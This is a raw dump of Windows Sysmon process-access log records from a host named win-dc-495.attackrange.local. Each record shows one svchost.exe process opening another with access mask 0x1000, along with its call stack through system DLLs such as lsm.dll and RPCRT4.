13:58:22.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010896Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010895Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010894Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010893Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010892Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010891Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010890Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010889Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010888Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010887Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010886Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010885Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010884Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010883Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010882Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010881Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010880Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.274{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010879Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.274{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010878Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.274{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010877Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.274{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010876Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.274{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010875Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.274{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010874Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.274{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010873Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
